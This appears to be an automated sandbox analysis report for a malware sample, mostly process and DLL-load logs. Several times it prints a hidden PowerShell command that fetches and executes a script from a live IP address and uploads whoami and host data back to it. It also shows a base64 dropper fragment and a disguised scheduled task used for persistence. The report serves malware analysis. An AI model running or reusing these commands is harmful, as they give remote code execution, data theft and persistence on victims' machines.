              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\Z:\syscalls\amsi64_7332.amsi.csve.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79727000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3415629273.000001DE5F8CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdb;+O source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo1 source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNo
              Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='…
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF848F20D69 push ebx; ret 6_2_00007FF848F20D6A

              Persistence and Installation Behavior

              Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Boot Survival

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f

              Hooking and other Techniques for Hiding and Protection

              Source: unknown | Network traffic detected: HTTP traffic on port 58056 -> 43820
              Source: unknown | Network traffic detected: HTTP traffic on port 58057 -> 43820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
